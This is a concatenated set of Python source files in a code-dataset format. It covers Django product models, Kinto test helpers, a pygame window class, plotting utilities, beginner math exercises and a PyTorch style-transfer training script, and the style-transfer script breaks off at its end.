x[0] < x[1]),\n)\ndef test_scale_value(\n value: float,\n input_range: Tuple[float, float],\n output_range: Tuple[float, float],\n):\n input_lower, input_upper = input_range\n output_lower, output_upper = output_range\n assume(min(input_lower, input_upper) <= value <= max(input_lower, input_upper))\n result = scale_value(value, input_lower, input_upper, output_lower, output_upper)\n assert output_lower <= result <= output_upper\n","sub_path":"tests/test_scalers.py","file_name":"test_scalers.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"438976128","text":"from cms.models.pluginmodel import CMSPlugin\nfrom cms.models.fields import models\n\n\nclass Category(models.Model):\n title = models.CharField(max_length=250, verbose_name='Наименование')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __repr__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n\nclass SubCategory(models.Model):\n title = models.CharField(max_length=250, verbose_name='Подкатегория')\n\n class Meta:\n verbose_name = 'Подкадегория'\n verbose_name_plural = 'Подкадегории'\n\n def __repr__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n\nclass Product(models.Model):\n category = models.ForeignKey(\n Category, on_delete=models.PROTECT,\n verbose_name='Категория')\n\n sub_category = models.ForeignKey(\n SubCategory, on_delete=models.PROTECT,\n verbose_name='Подкатегория')\n\n code = models.IntegerField(verbose_name='Код')\n name = models.CharField(max_length=150, verbose_name='Наименование')\n unit = models.CharField(max_length=50, verbose_name='Осн. ед изм.')\n full_name = models.CharField(max_length=120, verbose_name='Полное наименование')\n nds = models.CharField(max_length=20, verbose_name='Ставка НДС')\n\n remains = models.FloatField(\n null=True, blank=True,\n verbose_name='Остаток')\n\n price = models.FloatField(\n null=True, blank=True,\n verbose_name='Цена')\n\n reserve_on_firm = models.FloatField(\n null=True, blank=True,\n verbose_name='Резерв по фирме')\n\n remains_fact = models.FloatField(\n null=True, blank=True,\n verbose_name='Остаток факт.')\n\n val = models.TextField(\n null=True, blank=True,\n verbose_name='Вал')\n\n purchase = models.FloatField(\n null=True, blank=True,\n verbose_name='Закупка')\n\n country_of_origin = models.CharField(\n max_length=120, null=True, blank=True,\n verbose_name='Страна происхождения')\n\n gdt_number = models.CharField(\n max_length=50, null=True, blank=True,\n verbose_name='Номер ГДТ')\n\n storage_life = models.CharField(\n max_length=150, null=True, blank=True,\n verbose_name='Срок хранения')\n\n storage_conditions = models.TextField(\n null=True, blank=True,\n verbose_name='Условия хранения')\n\n cert_of_conformity = models.CharField(\n max_length=250, null=True, blank=True,\n verbose_name='Сертификат соответствия')\n\n gost_ty = models.TextField(\n null=True, blank=True,\n verbose_name='Нормативно технический документ (ГОСТ, ТУ)')\n\n basic_property = models.TextField(\n null=True, blank=True,\n verbose_name='Основное свойство')\n\n print_name = models.CharField(\n max_length=150, null=True, blank=True,\n verbose_name='Наименование для печати')\n\n articule = models.TextField(\n null=True, blank=True,\n verbose_name='Артикул')\n\n edizm_base = models.CharField(\n max_length=200, null=True, blank=True,\n verbose_name='Базовая ед изм.')\n\n base_weight = models.CharField(\n max_length=250, null=True, blank=True,\n verbose_name='Вес Базовый (кг)')\n\n base_barcode = models.TextField(\n null=True, blank=True,\n verbose_name='Штрихкод базовый')\n\n class Meta:\n verbose_name = 'Номенклатуру'\n verbose_name_plural = 'Номенклатура'\n ordering = ('name', 'remains',)\n\n def __repr__(self):\n return self.name\n\n def __str__(self):\n return self.name\n","sub_path":"apps/djangocms_apps/catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"32703230","text":"try:\n import unittest2 as unittest\nexcept ImportError:\n import unittest # NOQA\n\nimport webtest\nfrom kinto.core import utils\nfrom kinto.tests.core import support as core_support\nfrom kinto import main as testapp\nfrom kinto import DEFAULT_SETTINGS\n\n\nMINIMALIST_BUCKET = {}\nMINIMALIST_COLLECTION = {}\nMINIMALIST_GROUP = {'data': dict(members=['fxa:user'])}\nMINIMALIST_RECORD = {'data': dict(name=\"Hulled Barley\",\n type=\"Whole Grain\")}\nUSER_PRINCIPAL = 'basicauth:3a0c56d278def4113f38d0cfff6db1b06b84fcc4384ee890' \\\n 'cf7bbaa772317e10'\n\n\nclass BaseWebTest(object):\n\n def __init__(self, *args, **kwargs):\n super(BaseWebTest, self).__init__(*args, **kwargs)\n self.principal = USER_PRINCIPAL\n self.app = self._get_test_app()\n self.storage = self.app.app.registry.storage\n self.permission = self.app.app.registry.permission\n self.cache = self.app.app.registry.cache\n self.storage.initialize_schema()\n self.permission.initialize_schema()\n self.cache.initialize_schema()\n self.headers = {\n 'Content-Type': 'application/json',\n }\n self.headers.update(get_user_headers('mat'))\n\n def _get_test_app(self, settings=None):\n app = webtest.TestApp(testapp({}, **self.get_app_settings(settings)))\n app.RequestClass = core_support.get_request_class(prefix=\"v1\")\n return app\n\n def get_app_settings(self, additional_settings=None):\n settings = core_support.DEFAULT_SETTINGS.copy()\n settings.update(**DEFAULT_SETTINGS)\n settings['cache_backend'] = 'kinto.core.cache.memory'\n settings['storage_backend'] = 'kinto.core.storage.memory'\n settings['permission_backend'] = 'kinto.core.permission.memory'\n settings['userid_hmac_secret'] = \"this is not a secret\"\n settings['includes'] = \"kinto.plugins.default_bucket\"\n\n if additional_settings is not None:\n settings.update(additional_settings)\n return settings\n\n def tearDown(self):\n super(BaseWebTest, self).tearDown()\n self.storage.flush()\n self.cache.flush()\n self.permission.flush()\n\n def create_group(self, bucket_id, group_id, members=None):\n if members is None:\n group = MINIMALIST_GROUP\n else:\n group = {'data': {'members': members}}\n group_url = '/buckets/%s/groups/%s' % (bucket_id, group_id)\n self.app.put_json(group_url, group,\n headers=self.headers, status=201)\n\n def create_bucket(self, bucket_id):\n self.app.put_json('/buckets/%s' % bucket_id, MINIMALIST_BUCKET,\n headers=self.headers, status=201)\n\n\ndef get_user_headers(user):\n credentials = \"%s:secret\" % user\n authorization = 'Basic {0}'.format(utils.encode64(credentials))\n return {\n 'Authorization': authorization\n }\n","sub_path":"kinto/tests/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"611434499","text":"'''Faça um programa que leia um número qualquer e mostre o seu fatorial.\n\nex:\n5! = 5x4x3x2x1= 120'''\n\n'''count = 1\nnum = int(input('Digite um número inteiro para descobir o seu fatorial: '))\nprint('{}! = {}x'.format(num, num), end='')\nwhile count < num:\n n_num = num\n for c in range(num-1,0,-1):\n n_num = n_num * c\n print('{}x'.format(c), end='')\n count += 1\nprint('={}'.format(n_num))'''\n\n'''from math import factorial\nn = int(input('Digite um número para calcular seu fatorial: '))\nf = factorial(n)\nprint('O fatorial de {} é {}'.format(n, f))'''\n\n\nnum = int(input('Digite um número inteiro para descobir o seu fatorial: '))\nc = num\nf = 1\nprint('{}! = '.format(num), end='')\nwhile c > 0:\n print('{}'.format(c), end='')\n print(' x ' if c > 1 else ' = ', end='')\n f *= c\n c -= 1\nprint('{}'.format(f))\n\n","sub_path":"Desafio060.py","file_name":"Desafio060.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"628097332","text":"from __future__ import division\n\nfrom mycolors import *\n\nimport pygame\nfrom pygame.locals import *\nimport time\nimport json\n\n\n\nclass Window:\n made=0\n\n def __init__(self,name=\"Unnamed\",size=None,text_font=\"monospace\",text_size=65,text_color=WHITE,background_color=BLACK,fullscreen=False,build=True):\n \"\"\"Create a window object using name, size text_font, text_size, text_color, background and set.\"\"\"\n Window.made+=1\n self.number=Window.made\n self.name=name\n self.size=size\n self.text_font=text_font\n self.text_size=text_size\n self.text_color=text_color\n self.background_color=background_color\n self.fullscreen=fullscreen\n self.set()\n self.log(\"Window has been created.\")\n if build:\n self.build()\n\n def set(self):\n \"\"\"Set builtins attributs of window object.\"\"\"\n self.RIGHT = 0\n self.UP = 1\n self.LEFT = 2\n self.DOWN = 3\n self.selecter_color=self.reverseColor(self.background_color)\n self.open=False\n self.screenshots_taken=0\n self.pause_cool_down=1\n self.time=time.time()\n self.pause_time=0.2\n\n def build(self):\n \"\"\"Creates apparent window.\"\"\"\n pygame.init()\n self.info = pygame.display.Info()\n self.font = pygame.font.SysFont(self.text_font, self.text_size)\n if self.size is None:\n if self.fullscreen:\n self.size=[self.info.current_w,self.info.current_h]\n else:\n self.size=[2*self.info.current_w//3,2*self.info.current_h//3]\n self.coordonnates=[0,0]+self.size\n if self.fullscreen:\n self.screen=pygame.display.set_mode(self.size,FULLSCREEN)\n else:\n self.screen=pygame.display.set_mode(self.size,RESIZABLE)\n pygame.display.set_caption(self.name)\n if self.text_color is None:\n self.text_color=self.reverseColor(self.background_color)\n self.clear()\n self.flip()\n self.open=True\n\n def clear(self,color=None):\n \"\"\"Clear to background color.\"\"\"\n if color is None:\n color=self.background_color\n self.screen.fill(color)\n\n def scale(self,picture,size):\n \"\"\"Return scaled picture using picture and size.\"\"\"\n return pygame.transform.scale(picture,size)\n\n def check(self):\n \"\"\"Update window's state depending if close buttons are pressed.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.open=False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.open=False\n\n def update(self):\n \"\"\"Updates all window's main attributs.\"\"\"\n self.mouse_click=bool(pygame.mouse.get_pressed()[0])\n self.mouse_position=pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.open=False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.open=False\n\n def pause(self):\n \"\"\"Wait for user to click on space.\"\"\"\n while self.open:\n self.check()\n keys=pygame.key.get_pressed()\n if keys[K_SPACE]:\n break\n if self.open:\n time.sleep(self.pause_time)\n\n def press(self):\n \"\"\"Return all keys.\"\"\"\n return pygame.key.get_pressed()\n\n def direction(self):\n \"\"\"Return keys for arrows pressed. Trigonometric orientation is used.\"\"\"\n keys=pygame.key.get_pressed()\n return (keys[K_RIGHT],keys[K_UP],keys[K_LEFT],keys[K_DOWN])\n\n\n def select(self):\n \"\"\"Wait for user to click on screen, then return cursor position.\"\"\"\n while self.open:\n self.check()\n for event in pygame.event.get():\n if event.type == MOUSEBUTTONDOWN and event.button == 1:\n return (event.pos[0],event.pos[1])\n\n def point(self):\n \"\"\"Return cursor position on screen.\"\"\"\n return pygame.mouse.get_pos()\n\n def click(self):\n \"\"\"Return bool value for clicking on screen.\"\"\"\n return bool(pygame.mouse.get_pressed()[0])\n\n def press(self):\n \"\"\"Return bool value for clicking on screen.\"\"\"\n return pygame.key.get_pressed()\n\n def flip(self):\n \"\"\"Refresh screen.\"\"\"\n pygame.display.flip()\n\n def screenshot(self):\n \"\"\"Save picture of the surface.\"\"\"\n self.picture_saved+=1\n pygame.image.save(self.screen,self.name+\"-\"+str(self.picture_saved)+\".png\")\n\n\n def getPicture(self,picture_directory):\n \"\"\"Return picture using picture directory.\"\"\"\n return pygame.image.load(picture_directory)\n\n def placePicture(self,picture_directory,coordonnates,color=None):\n \"\"\"Draw a picture on screen using pygame picture directory and position.\"\"\"\n x,y,sx,sy=coordonnates\n picture=pygame.image.load(picture_directory)\n picture=pygame.transform.scale(picture,(sx,sy))\n if color is not None:\n picture=colorize(picture,color)\n self.screen.blit(picture, position)\n\n def centerText(self,message,size=None):\n \"\"\"Centers Text on screen.\"\"\"\n sx,sy=self.size\n if size is None:\n size=self.text_size\n l=len(message)\n letter_size=size/4\n x=sx//2-letter_size*l//2\n y=sy//2-size/3\n return (x,y)\n\n def alert(self,message):\n \"\"\"Quickly display text on window.\"\"\"\n position=self.centerText(message)\n self.print(message,position)\n self.flip()\n\n def print(self,text,position,size=None,color=None,font=None):\n \"\"\"Display text on screen using position, size, color and font.\"\"\"\n if size is None:\n size=self.text_size\n if color is None:\n color=self.text_color\n if font is None:\n font=self.font\n label = font.render(text, 1, color)\n self.screen.blit(label, position)\n\n def drawRect(self,coordonnates,color):\n \"\"\"Draw a rectangle on the screen using color and coordonnates relative to window's fiducials.\"\"\"\n wsx,wsy=self.size\n wcx,wcy,wcsx,wcsy=self.coordonnates\n rcx,rcy,rcsx,rcsy=coordonnates\n x,y=(rcx-wcx,rcy-wcy)\n w,h=(rcsx*wsx/wcsx,rcsy*wsy/wcsy)\n pygame.draw.rect(self.screen,color,(x,y,w,h),0)\n\n def place(self,position):\n \"\"\"Return position relative to window's fiducials.\"\"\"\n wcx,wcy,wcsx,wcsy=self.coordonnates\n pcx,pcy=position\n x,y=(rcx-wcx,rcy-wcy)\n return (x,y)\n\n\n def randomColor(self):\n \"\"\"Return random color.\"\"\"\n import random\n r=random.randint(0,255)\n g=random.randint(0,255)\n b=random.randint(0,255)\n color=(r,g,b)\n return color\n\n def reverseColor(self,color):\n \"\"\"Return reverse color.\"\"\"\n r,g,b=color\n r=255-r\n g=255-g\n b=255-b\n color=(r,g,b)\n return color\n\n def lighten(self,color,luminosity=80): #View later\n \"\"\"Return lightened color using color and luminosity percentage.\"\"\"\n r,g,b=color\n if luminosity>=50:\n r+=(255-r)*luminosity/100\n g+=(255-g)*luminosity/100\n b+=(255-b)*luminosity/100\n else:\n r-=r*luminosity/100\n g-=g*luminosity/100\n b-=b*luminosity/100\n color=r,g,b\n return color\n\n def colorize(self,image, color):\n \"\"\"Return image colorized\"\"\"\n image = image.copy()\n image.fill((0,0,0,255),None,pygame.BLEND_RGBA_MULT)\n image.fill(color[0:3]+(0,),None,pygame.BLEND_RGBA_ADD)\n return image\n\n\n\n def wavelengthToRGB(self,wavelength):\n \"\"\"Convert wavelength to rgb color type.\"\"\"\n gamma,max_intensity=0.80,255\n def adjust(color, factor):\n if color==0: return 0\n else: return round(max_intensity*pow(color*factor,gamma))\n if 380<=wavelength<=440: r,g,b=-(wavelength-440)/(440-380),0,1\n elif 440<=wavelength<=490: r,g,b=0,(wavelength-440)/(490-440),1\n elif 490<=wavelength<=510: r,g,b=0,1,-(wavelength-510)/(510-490)\n elif 510<=wavelength<=580: r,g,b=(wavelength-510)/(580-510),1,0\n elif 580<=wavelength<=645: r,g,b=1,-(wavelength-645)/(645-580),0\n elif 645<=wavelength<=780: r,g,b=1,0,0\n else: r,g,b=0,0,0\n if 380<=wavelength<=420: factor=0.3+0.7*(wavelength-380)/(420-380)\n elif 420<=wavelength<=701: factor=1\n elif 701<=wavelength<=780: factor=0.3+0.7*(780-wavelength)/(780-700)\n else: factor=0\n r,g,b=adjust(r,factor),adjust(g,factor),adjust(b,factor)\n return (r,g,b)\n\n def kill(self):\n \"\"\"Quit pygame.\"\"\"\n pygame.quit()\n\n def log(self,message):\n \"\"\"Print message with window mention.\"\"\"\n text=\"[\"+self.name+\"] \"+message\n print(text)\n\n def __del__(self):\n \"\"\"Executed before the window is destroyed.\"\"\"\n self.log(\"Window has been closed.\")\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n w=Window(\"Window Prototype\")\n #save(w,\"grosse fenetre\")\n #w=load(\"grosse fenetre\")\n #print(w.lighten(BLUE))\n #w.alert(\"test\")\n w.pause()\n w.clear()\n w.alert(\"je raconte de la merde juste pour avoir une longue chaine de caractere\")\n w.pause()\n w.kill()\n","sub_path":"mywindow.py","file_name":"mywindow.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"55077714","text":"\"\"\"\n\n@author: Patrik Purgai\n@copyright: Copyright 2018, MiniFlow\n@license: MIT\n@email: purgai.patrik@gmail.com\n@date: 2018.08.17.\n\"\"\"\n\nimport seaborn as sns\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\n\ndef plot_scatter_2d(data):\n assert data.shape[1] == 2, 'Data must be 2 dimensional.'\n sns.heatmap(data, )\n\n\ndef plot_scatter_3d(data):\n raise NotImplementedError()\n\n\ndef plot_confusion_matrix(predictions, labels,\n classes=None, num_classes=None):\n \"\"\"Plots a confusion matrix from the provided labels and predictions.\"\"\"\n matrix = tf.confusion_matrix(\n predictions=predictions,\n labels=labels,\n num_classes=num_classes)\n matrix = matrix.numpy()\n if classes is not None:\n matrix = pd.DataFrame(data=matrix, columns=classes, index=classes)\n sns.heatmap(matrix)\n plt.show()\n\n\ndef plot_images_with_prediction(images, labels, predictions,\n ncols, nrows, classes=None):\n \"\"\"Plots images with labels and predictions.\"\"\"\n fig, ax = plt.subplots(ncols=ncols, nrows=nrows,\n figsize=(ncols * 2, nrows * 2))\n for i in range(len(images)):\n ax_i = ax.ravel()[i]\n if len(images[i].shape) == 2:\n ax_i.imshow(images[i].astype(np.uint8), cmap='Greys')\n else:\n ax_i.imshow(images[i].astype(np.uint8))\n prediction = predictions[i]\n label = labels[i]\n if classes is not None:\n prediction = classes[prediction]\n label = classes[label]\n\n ax_i.set_title(\n 'target: {} \\npred: {}'.format(label, prediction))\n ax_i.set_axis_off()\n\n plt.tight_layout()\n plt.show()\n\n\ndef plot_images(images, ncols, nrows):\n \"\"\"Plots images with labels and predictions.\"\"\"\n if len(images) > 10:\n images = random.sample(images, 10)\n nrows = 10\n\n fig, ax = plt.subplots(ncols=ncols, nrows=nrows,\n figsize=(ncols * 2, nrows * 2))\n\n for i in range(len(images)):\n for j in range(len(images[i])):\n ax_i = ax.ravel()[i * ncols + j]\n if len(images[i][j].shape) == 2:\n ax_i.imshow(images[i][j].astype(np.uint8), cmap='Greys')\n else:\n ax_i.imshow(images[i][j].astype(np.uint8))\n\n ax_i.set_axis_off()\n\n plt.tight_layout()\n plt.show()\n","sub_path":"experiments/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"39321806","text":"\"\"\"\nThe :mod:`pyspark_config.transformations` module includes dataclasses,\nmethods and transformation to transform the spark dataframes in a robust and\nconfigured manner.\n\"\"\"\n\nfrom .transformations import *\n\n__all__ = [\n 'Transformation',\n 'Base64',\n 'Cast',\n 'CollectList',\n 'Concatenate',\n 'DayOfMonth',\n 'DayOfWeek',\n 'DayOfYear',\n 'Filter',\n 'FilterByList',\n 'GroupBy',\n 'ListLength',\n 'Month',\n 'Normalization',\n 'Percentage',\n 'Select',\n 'SortBy',\n 'Split',\n 'Year'\n]","sub_path":"pyspark_config/transformations/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"97645744","text":"n = int(input())\nprint(\"Give me a number r that is LESS THAN the number n\")\nr = int(input())\n\n\ndef nCr(n, r):\n\n def factorial(p):\n fact = 1\n for i in range(1, p + 1):\n fact = fact*i\n return(fact)\n return((factorial(n)) / (factorial(r) * factorial(n-r)))\n\ny = nCr(n, r)\nprint(y)\n","sub_path":"Combinations(no import).py","file_name":"Combinations(no import).py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"41560254","text":"from collections import namedtuple\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\n# For getting VGG model\nimport torchvision.models.vgg as vgg\nimport torch.utils.model_zoo as model_zoo\n# Image transformation pipeline\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.optim import Adam\nfrom torch.autograd import Variable\nfrom PIL import Image\nfrom tqdm import tqdm_notebook\nfrom torchvision import transforms, models\nfrom transformer_net import TransformerNet\nfrom utils import gram_matrix, recover_image, tensor_normalizer\nimport os\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\ngpu = '3'\ngpu = gpu.split(',')\nos.environ['CUDA_VISIBLE_DEVICES'] = ','.join(gpu)\nos.environ['QT_QPA_PLATFORM']='offscreen'\n\n\n\n# SEED = 1080\n# np.random.seed(SEED)\n# torch.manual_seed(SEED)\n# if torch.cuda.is_available():\n# torch.cuda.manual_seed(SEED)\n# torch.set_default_tensor_type('torch.cuda.FloatTensor')\n# kwargs = {'num_workers': 4, 'pin_memory': True}\n# else:\n# torch.set_default_tensor_type('torch.FloatTensor')\n# kwargs = {}\nkwargs = {'num_workers': 4, 'pin_memory': True}\n\nIMAGE_SIZE = 256\nBATCH_SIZE = 4\nDATASET = \"./coco/\"\ntransform = transforms.Compose([transforms.Resize((IMAGE_SIZE, IMAGE_SIZE)),\n transforms.CenterCrop(IMAGE_SIZE),\n transforms.ToTensor(),\n tensor_normalizer()])\n# http://pytorch.org/docs/master/torchvision/datasets.html#imagefolder\ntrain_dataset = datasets.ImageFolder(DATASET, transform)\n# http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader\ntrain_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True, **kwargs)\n\n\n# LossOutput = namedtuple(\"LossOutput\", [\"conv2_0\", \"conv2_1\", \"conv2_2\", \"conv2_3\"])\n#\n#\n# # https://discuss.pytorch.org/t/how-to-extract-features-of-an-image-from-a-trained-model/119/3\n# class LossNetwork(torch.nn.Module):\n# def __init__(self, resnet_model):\n# super(LossNetwork, self).__init__()\n# self.model = resnet_model\n# self.layers1 = {'2': 'conv1_2'}\n# self.layers2 = {'0': 'conv2_0',\n# '1': 'conv2_1',\n# '2': 'conv2_2',\n# '3': 'conv2_3'\n# }\n# self.layers3 = {'5': 'conv3_5'}\n# self.layers4 = {'2': 'conv4_2'}\n#\n#\n# def forward(self, x):\n# output = {}\n# x = self.model.conv1(x)\n# x = self.model.bn1(x)\n# x = self.model.relu(x)\n# x = self.model.maxpool(x)\n#\n# for name, layer in enumerate(self.model.layer1):\n# x = layer(x)\n# for name, layer in enumerate(self.model.layer2):\n# x = layer(x)\n# if str(name) in self.layers2:\n# output[self.layers2[str(name)]] = x\n# for name, layer in enumerate(self.model.layer3):\n# x = layer(x)\n# for name, layer in enumerate(self.model.layer4):\n# x = layer(x)\n#\n# return LossOutput(**output)\n\n\nLossOutput = namedtuple(\"LossOutput\", [\"conv0_0\", \"conv1_2\", \"conv2_3\", \"conv3_5\", \"conv4_2\"])\n\n\n# https://discuss.pytorch.org/t/how-to-extract-features-of-an-image-from-a-trained-model/119/3\nclass LossNetwork(torch.nn.Module):\n def __init__(self, resnet_model):\n super(LossNetwork, self).__init__()\n self.model = resnet_model\n self.layers1 = {'2': 'conv1_2'}\n self.layers2 = {'3': 'conv2_3'}\n self.layers3 = {'5': 'conv3_5'}\n self.layers4 = {'2': 'conv4_2'}\n\n\n def forward(self, x):\n output = {}\n x = self.model.conv1(x)\n x = self.model.bn1(x)\n x = self.model.relu(x)\n output['conv0_0'] = x\n x = self.model.maxpool(x)\n\n for name, layer in enumerate(self.model.layer1):\n x = layer(x)\n if str(name) in self.layers1:\n output[self.layers1[str(name)]] = x\n for name, layer in enumerate(self.model.layer2):\n x = layer(x)\n if str(name) in self.layers2:\n output[self.layers2[str(name)]] = x\n for name, layer in enumerate(self.model.layer3):\n x = layer(x)\n if str(name) in self.layers3:\n output[self.layers3[str(name)]] = x\n for name, layer in enumerate(self.model.layer4):\n x = layer(x)\n if str(name) in self.layers4:\n output[self.layers4[str(name)]] = x\n\n return LossOutput(**output)\n\n\n# class LossNetwork(torch.nn.Module):\n# def __init__(self, vgg_model):\n# super(LossNetwork, self).__init__()\n# self.vgg_layers = vgg_model.features\n# self.layer_name_mapping = {\n# '3': \"relu1_2\",\n# '8': \"relu2_2\",\n# '15': \"relu3_3\",\n# '22': \"relu4_3\"\n# }\n#\n# def forward(self, x):\n# output = {}\n# for name, module in self.vgg_layers._modules.items():\n# x = module(x)\n# if name in self.layer_name_mapping:\n# output[self.layer_name_mapping[name]] = x\n# return LossOutput(**output)\n\n\n\nresnet_model = models.resnet50(pretrained=True)\nif torch.cuda.is_available():\n resnet_model.cuda()\nloss_network = LossNetwork(resnet_model)\nloss_network.eval()\n\nARCHITECTURE = 'resnet50'\nSTYLE_FIELD = 'picasso'\nPRETRAIN = 'imagenet'\n\ndef save_checkpoint(state, filename='checkpoint_res.pth.tar'):\n torch.save(state, filename)\n\nsave_checkpoint({\n 'state_dict_m': resnet_model.cpu().state_dict(),\n}, filename='./transformer_ckpts/checkpoint_pretrain_' + ARCHITECTURE + '_' + PRETRAIN + '_' + STYLE_FIELD + '.pth.tar')\nresnet_model.cuda()\nloss_network = LossNetwork(resnet_model)\nloss_network.eval()\ndel resnet_model\n\nSTYLE_IMAGE = \"style_images/picasso.jpg\"\nstyle_img = Image.open(STYLE_IMAGE).convert('RGB')\nstyle_img_tensor = transforms.Compose([\n transforms.Resize((IMAGE_SIZE, IMAGE_SIZE)),\n transforms.ToTensor(),\n tensor_normalizer()]\n)(style_img).unsqueeze(0)\n# assert np.sum(style_img - recover_image(style_img_tensor.numpy())[0].astype(np.uint8)) < 3 * style_img_tensor.size()[2] * style_img_tensor.size()[3]\nif torch.cuda.is_available():\n style_img_tensor = style_img_tensor.cuda()\n\nplt.imshow(recover_image(style_img_tensor.cpu().numpy())[0])\n\nplt.imshow(recover_image(style_img_tensor.cpu().numpy())[0])\n\n# http://pytorch.org/docs/master/notes/autograd.html#volatile\nstyle_loss_features = loss_network(Variable(style_img_tensor, volatile=True))\ngram_style = [Variable(gram_matrix(y).data, requires_grad=False) for y in style_loss_features]\n\n# style_loss_features._fields\n#\n# np.mean(gram_style[3].data.cpu().numpy())\n#\n# np.mean(style_loss_features[3].data.cpu().numpy())\n#\n# gram_style[0].numel()\n\ndef save_debug_image(tensor_orig, tensor_transformed, filename):\n assert tensor_orig.size() == tensor_transformed.size()\n result = Image.fromarray(recover_image(tensor_transformed.cpu().numpy())[0])\n orig = Image.fromarray(recover_image(tensor_orig.cpu().numpy())[0])\n new_im = Image.new('RGB', (result.size[0] * 2 + 5, result.size[1]))\n new_im.paste(orig, (0,0))\n new_im.paste(result, (result.size[0] + 5,0))\n new_im.save(filename)\n\ntransformer = TransformerNet()\nmse_loss = torch.nn.MSELoss()\n# l1_loss = torch.nn.L1Loss()\nif torch.cuda.is_available():\n transformer.cuda()\n\nCONTENT_WEIGHT = 1e4\nSTYLE_WEIGHT = 1e10\nLOG_INTERVAL = 200\nREGULARIZATION = 1e-7\n\nLR = 1e-4\noptimizer = Adam(transformer.parameters(), LR)\ntransformer.train()\nfor epoch in range(3):\n agg_content_loss = 0.\n agg_style_loss = 0.\n agg_reg_loss = 0.\n count = 0\n for batch_id, (x, _) in tqdm_notebook(enumerate(train_loader), total=len(train_loader)):\n n_batch = len(x)\n count += n_batch\n optimizer.zero_grad()\n x = Variable(x)\n if torch.cuda.is_available():\n x = x.cuda()\n\n y = transformer(x)\n xc = Variable(x.data, volatile=True)\n\n features_y = loss_network(y)\n features_xc = loss_network(xc)\n\n f_xc_c = Variable(features_xc[1].data, requires_grad=False)\n\n content_loss = CONTENT_WEIGHT * mse_loss(features_y[1], f_xc_c)\n\n reg_loss = REGULARIZATION * (\n torch.sum(torch.abs(y[:, :, :, :-1] - y[:, :, :, 1:])) +\n torch.sum(torch.abs(y[:, :, :-1, :] - y[:, :, 1:, :])))\n\n style_loss = 0.\n for m in range(len(features_y)):\n gram_s = gram_style[m]\n gram_y = gram_matrix(features_y[m])\n style_loss += STYLE_WEIGHT * mse_loss(gram_y, gram_s.expand_as(gram_y))\n\n total_loss = content_loss + style_loss + reg_loss\n total_loss.backward()\n optimizer.step()\n\n agg_content_loss += content_loss.item()\n agg_style_loss += style_loss.item()\n agg_reg_loss += reg_loss.item()\n\n if (batch_id + 1) % LOG_INTERVAL == 0:\n mesg = \"{} [{}/{}] content: {:.6f} style: {:.6f} reg: {:.6f} total: {:.6f}\".format(\n time.ctime(), count, len(train_dataset),\n agg_content_loss / LOG_INTERVAL,\n agg_style_loss / LOG_INTERVAL,\n agg_reg_loss / LOG_INTERVAL,\n (agg_content_loss + agg_style_loss + agg_reg_loss) / LOG_INTERVAL\n )\n print(mesg)\n agg_content_loss = 0\n agg_style_loss = 0\n agg_reg_loss = 0\n transformer.eval()\n y = transformer(x)\n save_debug_image(x.data, y.data, \"debug/{}_{}.png\".format(epoch, count))\n transformer.train()\n\nimport glob\nfnames = glob.glob(DATASET + \"/*/*\")\nlen(fnames)\n\ntransformer = transformer.eval()\n\nimg = Image.open(fnames[40]).convert('RGB')\ntransform = transforms.Compose([transforms.Resize((IMAGE_SIZE, IMAGE_SIZE)),\n transforms.CenterCrop(IMAGE_SIZE),\n transforms.ToTensor(),\n tensor_normalizer()])\nimg_tensor = transform(img).unsqueeze(0)\nif torch.cuda.is_available():\n img_tensor = img_tensor.cuda()\n\nimg_output = transformer(Variable(img_tensor, volatile=True))\nplt.imshow(recover_image(img_tensor.cpu().numpy())[0])\n\nImage.fromarray(recover_image(img_output.data.cpu().numpy())[0])\n\nsave_model_path = \"model_udnie_imagenet_resnet2.pth\"\ntorch.save(transformer.state_dict(), save_model_path)\n\ntransformer.load_state_dict(torch.load(save_model_path))\n\nimg = Image.open(\"content_images/amber.jpg\").convert('RGB')\ntransform = transforms.Compose([transforms.ToTensor(),\n tensor_normalizer()])\nimg_tensor = transform(img).unsqueeze(0)\nprint(img_tensor.size())\nif torch.cuda.is_available():\n img_tensor = img_tensor.cuda()\n\nimg_output = transformer(Variable(img_tensor, volatile=True))\nplt.imshow(recover_image(img_tensor.cpu().numpy())[0])\n\nplt.imshow(recover_image(img_output.data.cpu().numpy())[0])\n\noutput_img = 